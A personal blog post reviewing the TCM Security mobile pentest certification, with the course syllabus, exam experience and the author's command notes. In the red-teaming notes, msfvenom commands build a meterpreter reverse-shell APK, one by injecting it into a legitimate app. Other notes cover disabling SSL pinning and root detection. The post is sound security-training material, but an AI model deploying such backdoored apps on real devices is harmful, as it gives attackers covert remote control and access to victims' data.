Post

Practical Mobile Pentest Associate (PMPA)

A review of the certification offered by TCM Security Academy

Posted
By twypsy
9 min read
Practical Mobile Pentest Associate (PMPA)

Intro

A few months ago, I decided to embark on the journey of learning mobile application security. I had acquired an education bundle by 7asecurity, consisting of Hacking Android, iOS and IoT apps and Hacking Android, iOS and IoT apps extreme.

However, these courses were intermediate/advanced in terms of knowledge. Additionally, I needed to buy a jailbreakable iphone for the iOS section of the course. Both factors led me to delay starting the courses, causing a bit of frustration.

Therefore, I decided it might be a better idea to enroll on an introductory course, otherwise I would keep delaying this even more. Eventually, I settled on the certification Practical Mobile Pentest Associate Certification (PMPA) provided by TCM Security.

I had already studied another certification with them on the past, Practical OSINT Research Professional Certification (PORP), which turned out to be a nice experience. They were offering a discount as well, so this was a no-brainer for me in the end.

On this blog post you may find a description of the PMPA certification content, my personal notes, my exam experience, along with a review on the quality of the course.

Course

Content

  • Introduction and Course Resources
    • Course Introduction (7:25)
    • Course Resources (6:52)
    • Mobile Pentesting Certification Landscape (4:37)
    • Device Requirements (4:10)
    • Course Discord (2:04)
  • Penetration Testing Process
    • The Penetration Testing Process (8:16)
    • The Mobile Application Penetration Testing Process (20:26)
  • Android Intro and Security Architecture
    • Android Security Architecture (22:05)
    • Application Security and Signing Process (5:52)
  • Android Lab Setup
    • Windows - JADX-GUI (1:49)
    • Windows - adb Install (2:53)
    • Windows - apktool install (4:09)
    • Windows - Android Studio Install (1:55)
    • Kali Linux - PimpMyKali (Easy Mode) (3:59)
    • Kali Linux - adb Install (0:20)
    • Kali Linux - apktool Install (1:12)
    • Kali Linux - JADX-GUI Install (2:34)
    • Kali Linux - Android Studio Install (4:22)
    • Mac - Brew (1:16)
    • Mac - JADX-GUI (0:45)
    • Mac - apktool (0:47)
    • Mac - Android Studio (6:03)
    • Emulator Setup & Recommendations (All Platforms) (10:38)
    • Accessing ADB Shell from a VM/Networked Device (4:39)
    • Additional Emulator Options Android (Optional) (2:33)
    • Physical Device Setup (Optional) (4:50)
    • Common Issue: No Extended Controls (1:45)
  • Android Static Analysis
    • Pulling an APK From the Google Play Store (5:37)
    • Intro to Injured Android (3:14)
    • Android Manifest.xml (9:26)
    • Manual Static Analysis (9:50)
    • How to Find Hardcoded Strings (11:53)
    • Injured Android Static Analysis (Flags 1-4) (11:59)
    • Enumerating AWS Storage Buckets via Static Analysis (9:05)
    • Enumerating Firebase Databases via Static Analysis (7:25)
    • Automated Analysis using MobSF (20:53)
  • Android Dynamic Analysis
    • Intro to SSL Pinning/Dynamic Analysis (9:13)
    • Dynamic Analysis using MobSF (16:07)
    • Burp Suite Install and Overview (7:39)
    • Burp Suite Setup/Intercept (8:08)
    • Proxyman Install & Usage (12:41)
    • Patching Applications Automatically using Objection (7:47)
    • Patching Applications Manually (16:05)
    • Dynamic Analysis - Final Notes and Vectors (6:10)
    • The Frida Codeshare (2:32)
    • Using Frida Codeshare & Startup Scripts (2:51)
    • Common Issue: Can’t Decode Resources (1:24)
  • Android Bug Bounty Hunt
    • Bounty Hunt 1 - Joann Fabrics (34:01)
    • Bounty Hunt 2 - Zaxby’s (17:30)
  • BONUS - Android Red Teaming
    • In-Line Attacks (4:16)
    • Creating a Generic APK with Metasploit Shell (7:33)
    • Injecting Play Store App with Metasploit Shell (10:39)
    • The Ghost Framework (5:07)
  • iOS Introduction and Architecture
    • Intro to iOS (10:35)
  • iOS Lab Setup
    • xCode Setup/Install (3:19)
    • Using xCode (7:23)
    • Developer License Setup (3:53)
    • AnyTrans (Pull IPA from App Store) (4:59)
    • IPATool (Pull IPA from App Store - Updated) (5:48)
    • Additional Emulator Options iOS (Optional) (2:35)
  • iOS Static Analysis
    • Manual Static Analysis (7:13)
    • Automated Analysis with MobSF (10:48)
  • iOS Dynamic Analysis/Jailbreaking
    • Burp Suite Setup & Usage (4:56)
    • Proxyman - iOS (6:24)
    • SSL Pinning iOS (1:55)
    • Using Objection for iOS (9:35)
    • Jailbreaking (8:08)
    • Burp Mobile Assistant (Optional) (5:44)
    • SSL Killswitch (9:22)
    • Jailbreaking iOS 15.x-16.x (8:26)
    • SSL Killswitch iOS 15.x-16.x (3:06)
    • Traffic Interception iOS 15.x-16.x (3:06)
  • iOS Bug Bounty Hunt
    • Bug Bounty Hunt 1 - Nike App (18:03)
    • Bug Bounty Hunt 2 - Kohl’s (11:57)
  • Wrapping Up
    • Next Steps: The Practical Mobile Pentest Associate (PMPA)

Notes

Below you may find my personal notes for the course and/or exam.

Commands

  1. How to start ADB with port open on host machine:
    • adb -a nodaemon server
    • Note: Use a firewall (iptables, ufw, nftables, firewalld, etc.) to allow connections only from the VM’s ip.
      E.g. sudo iptables -A INPUT -p tcp –dport 5037 ! -s SRC_IP -j DROP
  2. Commands
    1. Extract APK from a phone
      1. adb shell
      2. pm list packages | grep <insertIdentifier> (list packages installed on the phone, then filter by name)
      3. pm path <insertpackagename> (list the file path of the package)
      4. exit
      5. adb pull <insertPathToPackage> <insertNameOfNewFile>.apk (this will pull the apk from the file path on the phone and save it to our local system)

  3. To start activities: am start -n b3nac.injuredandroid/.fooBarActivity

  4. Objection/Frida codeshare scripts
    • objection explore -s “android root disable”
    • objection explore —startup-script sslpinninguniversal.js (the script needs to be downloaded)
  5. Objection
    • objection patchapk –source injured.apk
    • objection patchapk -V 16.7.19 —source injured.apk (to fix objc error)
    • objection patchapk -s blah.apk —use-aapt2
      • Objection decoding error “invalid resource directory name …”
      • The app is split in multiple apk files
    • -t, –target-class TEXT -> The target class to patch (where objection is going to be injected)
    • Split APKs
      • objection patchapk —V 16.7.19 -s <base.apk> –use-aapt2
      • objection signapk split_config (for each splitted apk file)
      • adb install-multiple a.objection.apk split_config.en.objection.apk …
  6. Dynamic analysis
    1. Commands upon doing objection explore
      • android clipboard monitor - Monitor clipboard
      • memory dump all - Dump memory
      • android heap - Extract heap
      • sqlite connect /pathtosqlitedb - Connect to a SQLite DB
      • android hooking - hook into a process
      • android intent - intents
      • android keystore - keystore
      • android root - root simulate / disable
      • android shell_exec - system command
      • android sslpinning disable - Disable ssl pinning
    2. Watch Logcat
    3. Check Filesystem
      1. SDCard directory -> sdcard/Android/data/packageName
      2. Data of the app under -> data/data/packageName
      3. wal, shm, journal database files are backup databases
      4. shared prefs folder
      5. cache
  7. Other
    • apktool d file.apk
  8. Red teaming
    • msfvenom -p android/meterpreter/reverse_tcp LHOST=<kali_IP> LPORT=<your_port> R > myapp.apk
      (This will make an app with a generic looking icon named “Main Activity”)
    • msfvenom -x my_app.apk -p android/meterpreter/reverse_tcp LHOST=<kali_ip> LPORT=<my_port> -o my_app_hacked.apk (Using a template apk)
  9. Bug Bounty
    • A nice tool for dealing with Split APKs: Patch-APK

  10. Sign

    On newer versions of the Android OS, jarsigner is no longer the recommended method for signing an APK. It’s recommended instead using apksigner to sign the APK. The process can be found in the following Stackoverflow post.

    How to sign application using apksigner:

    1. Generate keystore:
      keytool -genkey -v -keystore my.keystore -keyalg RSA -keysize 2048 -validity 10000 -alias app

    2. Zipalign the APK:
      zipalign -p 4 my.apk my-aligned.apk

    3. Sign the application:
      apksigner sign –ks-key-alias app –ks my.keystore my-aligned.apk

    4. Verify the application:
      apksigner verify my-aligned.apk

Troubleshooting

  1. In case you might face an “ObjC is not defined error” upon doing objection explore, apparently there’s a problem with the latest version of Frida and Objection. Thus, you need to downgrade frida to version 16.7.19 in order to fix the issue.

    pip install frida==16.7.19

    However, one important note, is that upon patching the apk, you still need to specify the version. Otherwise, Objection will use the latest version, causing a mismatch between the frida server running on the device, and the client.

    objection patchapk -V 16.7.19 -s injured.apk

  2. If you face an “Unable to run cleanups: script is destroyed” upon doing objection explore, use a device with a version lower than Android 13. Android 12 seems to work fine.

  3. If you get a connectivity error on Android, perhaps you forgot to import the burp cert.

  4. Frida Objection version hell

  5. IOS: SSL Kill Switch 3

Exam

The exam entails a 48 hours security assessment, where you will perform both static and dynamic analysis of an Android mobile application (there’s no iOS evaluation due to the requirement of a jailbroken physical device). After the assessment, you will have another 48 hours to compile all your findings into a final report.

Access to the exam environment is provided through a VPN connection, giving you access to a browser-based VM with all the tools already configured for your convenience. I didn’t experience any issues besides the slow speed of mobSF in order to access the report, which was quite painful.

There’s no proctoring involved either besides network monitoring.

You may discover as many vulnerabilities as possible, but in order to pass the exam, you will be required to achieve a very specific exploitation objective. Still, I may emphasize this is an introductory exam. In consequence, as long as you paid attention to the course content, plus some basic web exploitation skills, you should be fine.

Based on my personal experience, it’s more than reasonable to complete the practical part of the exam in 8-10 hours. This should give you enough time to go back over your notes, returning to the exam lab if needed to fill any missing information.

Finishing the report was definitely more time consuming, but it was doable in a day.

Therefore, if you allocate a weekend just for the exam, you shouldn’t need 4 days.

Overall impression

I would recommend this course to anyone willing to step into the field of mobile application security. It properly lays the foundations to conduct further studies, while removing any possible misconceptions in terms of difficulty and learning barriers compared to traditional web security.

The main focus of the course is Android security, as opposed to the iOS part which is more lightweight. However, it invites the student to buy an iPhone in order to jailbreak it and start tinkering. If it weren’t for this course, quite honestly, I would have postponed ad eternum buying a refurbished jailbreakable iPhone.

Next steps

Once time allows for it, I will undertake 7ASecurity, Hacking Android, iOS and IoT apps course, hoping to achieve the 7CMP certification. This is a more advanced course, but now I feel with enough confidence, and most importantly, with a jailbroken iPhone by my side.

vivi fire

learning, reviews
mobile pmpa
This post is licensed under CC BY 4.0 by the author.